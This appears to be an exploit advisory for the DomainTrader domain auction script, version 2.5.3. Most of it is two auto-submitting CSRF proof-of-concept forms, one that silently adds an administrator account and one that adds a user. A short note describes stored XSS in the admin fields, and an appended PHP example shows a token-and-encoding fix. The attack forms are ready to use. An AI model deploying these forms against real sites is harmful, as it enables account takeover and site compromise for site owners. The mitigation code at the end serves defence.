# Exploit Title: DomainTrader Domain Parking and Auction Script Multiple 0day Vulnerabilities
# Google Dork: Find yourself xD
# Date: 26/8/2014
# Exploit Author: Haider Mahmood | @HaiderMQ
# Vendor Homepage: http://www.smartscriptsolutions.com/domain-trader/
# Version: Tested on Latest Version 2.5.3

Add new administrator CSRF:

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">
$(document).ready(function() {
    window.document.forms[0].submit();
});
</script>
<form name="add_admin" id="add_admin" method="post" action="victim.com/admin/admincp.php">
  <input type="hidden" name="mode" value="addadminuser" />
  <table width="400" border="0" cellspacing="0" cellpadding="0">
    <tr>
      <td>Username:</td>
      <td><input name="username" type="text" value="USERNAME" /></td>
    </tr>
    <tr>
      <td>Email Address:</td>
      <td><input name="email_address" type="text" value="EMAIL_ADDRESS" /></td>
    </tr>
    <tr>
      <td>Password:</td>
      <td><input name="password" type="text" value="DESIRED_PASSWORD" /></td>
    </tr>
    <tr>
      <td><input name="submit" type="submit" value="Add User" /></td>
      <td> </td>
    </tr>
  </table>
</form>

Add new user CSRF:

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">
$(document).ready(function() {
    window.document.forms[0].submit();
});
</script>
<form name="add_user" id="add_user" method="post" action="victim.com/admin/admincp.php">
  <input type="hidden" name="mode" value="addnewuser">
  <table width="500" border="0" cellspacing="0" cellpadding="0">
    <tr>
      <td><span>Username:</span></td>
      <td><input type="text" name="user_name" id="user_name" value="USERNAME_VALUE"></td>
    </tr>
    <tr>
      <td><span>Password:</span></td>
      <td><input type="password" name="newpassword" id="newpassword" value="DESIRED_PASSWORD"></td>
    </tr>
    <tr>
      <td><span>Confirm Password:</span></td>
      <td><input type="password" name="cnewpassword" id="cnewpassword" value="DESIRED_PASSWORD"></td>
    </tr>
    <tr>
      <td width="200"><span>First Name:</span></td>
      <td width="300"><input type="text" name="first_name" id="first_name" value="FIRSTNAME"></td>
    </tr>
    <tr>
      <td><span>Last Name:</span></td>
      <td><input type="text" name="last_name" id="last_name" value="LASTNAME"></td>
    </tr>
    <tr>
      <td><span>Email Address:</span></td>
      <td><input type="text" name="email_address" id="email_address" value="DESIRED_VALUE"></td>
    </tr>
    <tr>
      <td><span>Telephone:</span></td>
      <td><input type="text" name="telephone" id="telephone" value="010101010"></td>
    </tr>
    <tr>
      <td><span>Street Address:</span></td>
      <td><input type="text" name="street_address" id="street_address" value="BLA_BLA_BLA"></td>
    </tr>
    <tr>
      <td><span>City:</span></td>
      <td><input type="text" name="city" id="city" value="BLA_BLA_BLA"></td>
    </tr>
    <tr>
      <td><span>County/State:</span></td>
      <td><input type="text" name="county" id="county" value="BLA_BLA_BLA"></td>
    </tr>
    <tr>
      <td><span>Postcode/Zipcode:</span></td>
      <td><input type="text" name="postcode" id="postcode" value="BLA_BLA_BLA"></td>
    </tr>
    <tr>
      <td><span>Country:</span></td>
      <td>
        <select name="country" id="country">
          <option value="AFGHANISTAN">AFGHANISTAN</option> <option value="ALBANIA">ALBANIA</option> <option value="ALGERIA">ALGERIA</option>
          <option value="AMERICAN SAMOA">AMERICAN SAMOA</option> <option value="ANDORRA">ANDORRA</option> <option value="ANGOLA">ANGOLA</option>
          <option value="ANTIGUA AND BARBUDA">ANTIGUA AND BARBUDA</option> <option value="ARGENTINA">ARGENTINA</option> <option value="ARMENIA">ARMENIA</option>
          <option value="ARUBA">ARUBA</option> <option value="AUSTRALIA">AUSTRALIA</option> <option value="AUSTRIA">AUSTRIA</option>
          <option value="AZERBAIJAN">AZERBAIJAN</option> <option value="BAHAMAS">BAHAMAS</option> <option value="BAHRAIN">BAHRAIN</option>
          <option value="BANGLADESH">BANGLADESH</option> <option value="BARBADOS">BARBADOS</option> <option value="BELARUS">BELARUS</option>
          <option value="BELGIUM">BELGIUM</option> <option value="BELIZE">BELIZE</option> <option value="BENIN">BENIN</option>
          <option value="BERMUDA">BERMUDA</option> <option value="BHUTAN">BHUTAN</option> <option value="BOLIVIA">BOLIVIA</option>
          <option value="BOSNIA AND HERZEGOVINA">BOSNIA AND HERZEGOVINA</option> <option value="BOTSWANA">BOTSWANA</option> <option value="BRAZIL">BRAZIL</option>
          <option value="BRITISH INDIAN OCEAN TERRITORY">BRITISH INDIAN OCEAN TERRITORY</option> <option value="BRUNEI DARUSSALAM">BRUNEI DARUSSALAM</option>
          <option value="BULGARIA">BULGARIA</option> <option value="BURKINA FASO">BURKINA FASO</option> <option value="BURUNDI">BURUNDI</option>
          <option value="CAMBODIA">CAMBODIA</option> <option value="CAMEROON">CAMEROON</option> <option value="CANADA">CANADA</option>
          <option value="CAPE VERDE">CAPE VERDE</option> <option value="CAYMAN ISLANDS">CAYMAN ISLANDS</option>
          <option value="CENTRAL AFRICAN REPUBLIC">CENTRAL AFRICAN REPUBLIC</option> <option value="CHAD">CHAD</option> <option value="CHILE">CHILE</option>
          <option value="CHINA">CHINA</option> <option value="COLOMBIA">COLOMBIA</option> <option value="COMOROS">COMOROS</option>
          <option value="CONGO">CONGO</option> <option value="COOK ISLANDS">COOK ISLANDS</option> <option value="COSTA RICA">COSTA RICA</option>
          <option value="COTE D'IVOIRE">COTE D'IVOIRE</option> <option value="CROATIA">CROATIA</option> <option value="CUBA">CUBA</option>
          <option value="CYPRUS">CYPRUS</option> <option value="CZECH REPUBLIC">CZECH REPUBLIC</option> <option value="DENMARK">DENMARK</option>
          <option value="DJIBOUTI">DJIBOUTI</option> <option value="DOMINICA">DOMINICA</option> <option value="DOMINICAN REPUBLIC">DOMINICAN REPUBLIC</option>
          <option value="ECUADOR">ECUADOR</option> <option value="EGYPT">EGYPT</option> <option value="EL SALVADOR">EL SALVADOR</option>
          <option value="EQUATORIAL GUINEA">EQUATORIAL GUINEA</option> <option value="ERITREA">ERITREA</option> <option value="ESTONIA">ESTONIA</option>
          <option value="ETHIOPIA">ETHIOPIA</option> <option value="FALKLAND ISLANDS (MALVINAS)">FALKLAND ISLANDS (MALVINAS)</option>
          <option value="FAROE ISLANDS">FAROE ISLANDS</option> <option value="FEDERATED STATES OF MICRONESIA">FEDERATED STATES OF MICRONESIA</option>
          <option value="FIJI">FIJI</option> <option value="FINLAND">FINLAND</option> <option value="FRANCE">FRANCE</option>
          <option value="FRENCH GUIANA">FRENCH GUIANA</option> <option value="FRENCH POLYNESIA">FRENCH POLYNESIA</option>
          <option value="FRENCH SOUTHERN TERRITORIES">FRENCH SOUTHERN TERRITORIES</option> <option value="GABON">GABON</option> <option value="GAMBIA">GAMBIA</option>
          <option value="GEORGIA">GEORGIA</option> <option value="GERMANY">GERMANY</option> <option value="GHANA">GHANA</option>
          <option value="GIBRALTAR">GIBRALTAR</option> <option value="GREECE">GREECE</option> <option value="GREENLAND">GREENLAND</option>
          <option value="GRENADA">GRENADA</option> <option value="GUADELOUPE">GUADELOUPE</option> <option value="GUAM">GUAM</option>
          <option value="GUATEMALA">GUATEMALA</option> <option value="GUINEA">GUINEA</option> <option value="GUINEA-BISSAU">GUINEA-BISSAU</option>
          <option value="GUYANA">GUYANA</option> <option value="HAITI">HAITI</option> <option value="HOLY SEE (VATICAN CITY STATE)">HOLY SEE (VATICAN CITY STATE)</option>
          <option value="HONDURAS">HONDURAS</option> <option value="HONG KONG">HONG KONG</option> <option value="HUNGARY">HUNGARY</option>
          <option value="ICELAND">ICELAND</option> <option value="INDIA">INDIA</option> <option value="INDONESIA">INDONESIA</option>
          <option value="IRAQ">IRAQ</option> <option value="IRELAND">IRELAND</option> <option value="ISLAMIC REPUBLIC OF IRAN">ISLAMIC REPUBLIC OF IRAN</option>
          <option value="ISRAEL">ISRAEL</option> <option value="ITALY">ITALY</option> <option value="JAMAICA">JAMAICA</option>
          <option value="JAPAN">JAPAN</option> <option value="JORDAN">JORDAN</option> <option value="KAZAKHSTAN">KAZAKHSTAN</option>
          <option value="KENYA">KENYA</option> <option value="KIRIBATI">KIRIBATI</option> <option value="KUWAIT">KUWAIT</option>
          <option value="KYRGYZSTAN">KYRGYZSTAN</option> <option value="LAO PEOPLE'S DEMOCRATIC REPUBLIC">LAO PEOPLE'S DEMOCRATIC REPUBLIC</option>
          <option value="LATVIA">LATVIA</option> <option value="LEBANON">LEBANON</option> <option value="LESOTHO">LESOTHO</option>
          <option value="LIBERIA">LIBERIA</option> <option value="LIBYAN ARAB JAMAHIRIYA">LIBYAN ARAB JAMAHIRIYA</option> <option value="LIECHTENSTEIN">LIECHTENSTEIN</option>
          <option value="LITHUANIA">LITHUANIA</option> <option value="LUXEMBOURG">LUXEMBOURG</option> <option value="MACAO">MACAO</option>
          <option value="MADAGASCAR">MADAGASCAR</option> <option value="MALAWI">MALAWI</option> <option value="MALAYSIA">MALAYSIA</option>
          <option value="MALDIVES">MALDIVES</option> <option value="MALI">MALI</option> <option value="MALTA">MALTA</option>
          <option value="MARSHALL ISLANDS">MARSHALL ISLANDS</option> <option value="MARTINIQUE">MARTINIQUE</option> <option value="MAURITANIA">MAURITANIA</option>
          <option value="MAURITIUS">MAURITIUS</option> <option value="MEXICO">MEXICO</option> <option value="MONACO">MONACO</option>
          <option value="MONGOLIA">MONGOLIA</option> <option value="MOROCCO">MOROCCO</option> <option value="MOZAMBIQUE">MOZAMBIQUE</option>
          <option value="MYANMAR">MYANMAR</option> <option value="NAMIBIA">NAMIBIA</option> <option value="NAURU">NAURU</option>
          <option value="NEPAL">NEPAL</option> <option value="NETHERLANDS">NETHERLANDS</option> <option value="NETHERLANDS ANTILLES">NETHERLANDS ANTILLES</option>
          <option value="NEW CALEDONIA">NEW CALEDONIA</option> <option value="NEW ZEALAND">NEW ZEALAND</option> <option value="NICARAGUA">NICARAGUA</option>
          <option value="NIGER">NIGER</option> <option value="NIGERIA">NIGERIA</option> <option value="NORTHERN MARIANA ISLANDS">NORTHERN MARIANA ISLANDS</option>
          <option value="NORWAY">NORWAY</option> <option value="OMAN">OMAN</option> <option value="PAKISTAN">PAKISTAN</option>
          <option value="PALAU">PALAU</option> <option value="PALESTINIAN TERRITORY">PALESTINIAN TERRITORY</option> <option value="PANAMA">PANAMA</option>
          <option value="PAPUA NEW GUINEA">PAPUA NEW GUINEA</option> <option value="PARAGUAY">PARAGUAY</option> <option value="PERU">PERU</option>
          <option value="PHILIPPINES">PHILIPPINES</option> <option value="POLAND">POLAND</option> <option value="PORTUGAL">PORTUGAL</option>
          <option value="PUERTO RICO">PUERTO RICO</option> <option value="QATAR">QATAR</option> <option value="REPUBLIC OF KOREA">REPUBLIC OF KOREA</option>
          <option value="REPUBLIC OF MOLDOVA">REPUBLIC OF MOLDOVA</option> <option value="REUNION">REUNION</option> <option value="ROMANIA">ROMANIA</option>
          <option value="RUSSIAN FEDERATION">RUSSIAN FEDERATION</option> <option value="RWANDA">RWANDA</option>
          <option value="SAINT KITTS AND NEVIS">SAINT KITTS AND NEVIS</option> <option value="SAINT LUCIA">SAINT LUCIA</option>
          <option value="SAINT VINCENT AND THE GRENADINES">SAINT VINCENT AND THE GRENADINES</option> <option value="SAMOA">SAMOA</option>
          <option value="SAN MARINO">SAN MARINO</option> <option value="SAO TOME AND PRINCIPE">SAO TOME AND PRINCIPE</option>
          <option value="SAUDI ARABIA">SAUDI ARABIA</option> <option value="SENEGAL">SENEGAL</option>
          <option value="SERBIA AND MONTENEGRO">SERBIA AND MONTENEGRO</option> <option value="SEYCHELLES">SEYCHELLES</option>
          <option value="SIERRA LEONE">SIERRA LEONE</option> <option value="SINGAPORE">SINGAPORE</option> <option value="SLOVAKIA">SLOVAKIA</option>
          <option value="SLOVENIA">SLOVENIA</option> <option value="SOLOMON ISLANDS">SOLOMON ISLANDS</option> <option value="SOMALIA">SOMALIA</option>
          <option value="SOUTH AFRICA">SOUTH AFRICA</option> <option value="SPAIN">SPAIN</option> <option value="SRI LANKA">SRI LANKA</option>
          <option value="SUDAN">SUDAN</option> <option value="SURINAME">SURINAME</option> <option value="SWAZILAND">SWAZILAND</option>
          <option value="SWEDEN">SWEDEN</option> <option value="SWITZERLAND">SWITZERLAND</option> <option value="SYRIAN ARAB REPUBLIC">SYRIAN ARAB REPUBLIC</option>
          <option value="TAIWAN">TAIWAN</option> <option value="TAJIKISTAN">TAJIKISTAN</option> <option value="THAILAND">THAILAND</option>
          <option value="THE DEMOCRATIC REPUBLIC OF THE CONGO">THE DEMOCRATIC REPUBLIC OF THE CONGO</option>
          <option value="THE FORMER GOSLAV REPUBLIC OF MACEDONIA">THE FORMER GOSLAV REPUBLIC OF MACEDONIA</option>
          <option value="TIMOR-LESTE">TIMOR-LESTE</option> <option value="TOGO">TOGO</option> <option value="TOKELAU">TOKELAU</option>
          <option value="TONGA">TONGA</option> <option value="TRINIDAD AND TOBAGO">TRINIDAD AND TOBAGO</option> <option value="TUNISIA">TUNISIA</option>
          <option value="TURKEY">TURKEY</option> <option value="TURKMENISTAN">TURKMENISTAN</option> <option value="TUVALU">TUVALU</option>
          <option value="UGANDA">UGANDA</option> <option value="UKRAINE">UKRAINE</option> <option value="UNITED ARAB EMIRATES">UNITED ARAB EMIRATES</option>
          <option value="UNITED KINGDOM">UNITED KINGDOM</option> <option value="UNITED REPUBLIC OF TANZANIA">UNITED REPUBLIC OF TANZANIA</option>
          <option value="UNITED STATES">UNITED STATES</option> <option value="URUGUAY">URUGUAY</option> <option value="UZBEKISTAN">UZBEKISTAN</option>
          <option value="VANUATU">VANUATU</option> <option value="VENEZUELA">VENEZUELA</option> <option value="VIET NAM">VIET NAM</option>
          <option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option> <option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option>
          <option value="YEMEN">YEMEN</option> <option value="ZAMBIA">ZAMBIA</option> <option value="ZIMBABWE">ZIMBABWE</option>
        </select>
      </td>
    </tr>
    <tr>
      <td colspan="2"><input name="new_message_notify" type="checkbox" value="1" /><span>Notify me by email when I receive a new message.</span></td>
    </tr>
    <tr>
      <td colspan="2"><input name="offer_received_notify" type="checkbox" value="1" /><span>Notify me by email when I receive a new offer.</span></td>
    </tr>
    <tr>
      <td colspan="2"><input name="offer_accepted_notify" type="checkbox" value="1" /><span>Notify me when an offer I made is accepted.</span></td>
    </tr>
    <tr>
      <td colspan="2"><input name="offer_cancelled_notify" type="checkbox" value="1" /><span>Notify me when an offer I made is cancelled.</span></td>
    </tr>
    <tr>
      <td colspan="2"><input name="counter_offer_notify" type="checkbox" value="1" /><span>Notify me by email when a counter offer is made on a domain I own or am bidding on.</span></td>
    </tr>
    <tr>
      <td colspan="2"><input name="domain_pushed_notify" type="checkbox" value="1" /><span>Notify me by email when a domain is pushed.</span></td>
    </tr>
    <tr>
      <td colspan="2"><input name="sale_complete_notify" type="checkbox" value="1" /><span>Notify me by email when a domain sale is complete.</span></td>
    </tr>
    <tr>
      <td colspan="2"><input type="submit" name="Submit" value="Submit"></td>
    </tr>
  </table>
</form>

XSS:

The "Add new Administrator" field values are not sanitized, neither when they are inserted into the database nor when they are selected from it, so any markup stored in them is rendered back to other administrators as persistent (stored) XSS.
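Both issues are fixed on the server side, not in the forms. The example below is added here and is not DomainTrader's code or part of the advisory: it shows how the admincp.php "addadminuser" handler would reject the forged POSTs above with a per-session synchronizer token and encode stored administrator values on output. Only the mode, username, email_address and password field names come from the advisory; csrf_token(), require_csrf_token(), h(), add_admin_user() and the validation rules are assumptions.

```php
<?php
// Added example, not DomainTrader's own code: CSRF token guard and output
// encoding for the admincp.php "addadminuser" POST handler. The helper names
// and validation rules are assumptions; the field names come from the advisory.
session_start();

// One random token per session, embedded in every admin form as a hidden field.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A page on another origin (such as an auto-submitting form) cannot read the
// session token, so its POST fails this check before any user is created.
function require_csrf_token(): void {
    $known = $_SESSION['csrf_token'] ?? '';
    $sent  = $_POST['csrf_token'] ?? '';
    if ($known === '' || !is_string($sent) || !hash_equals($known, $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

// Encode on output: a stored username is rendered as text, never as markup.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['mode'] ?? '') === 'addadminuser') {
    require_csrf_token();
    $username = trim((string) ($_POST['username'] ?? ''));
    $email    = trim((string) ($_POST['email_address'] ?? ''));
    // Validate on input as well; a strict allow-list keeps markup out of the DB.
    if (!preg_match('/^[A-Za-z0-9_.-]{3,32}$/', $username)
        || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        http_response_code(400);
        exit('Invalid username or email address');
    }
    $hash = password_hash((string) ($_POST['password'] ?? ''), PASSWORD_DEFAULT);
    add_admin_user($username, $email, $hash); // assumed insert via a prepared statement
}
?>
<form method="post" action="admincp.php">
  <input type="hidden" name="mode" value="addadminuser">
  <input type="hidden" name="csrf_token" value="<?= h(csrf_token()) ?>">
  <!-- username, email_address and password inputs unchanged; when listing
       administrators, print h($row['username']) rather than the raw value -->
</form>
```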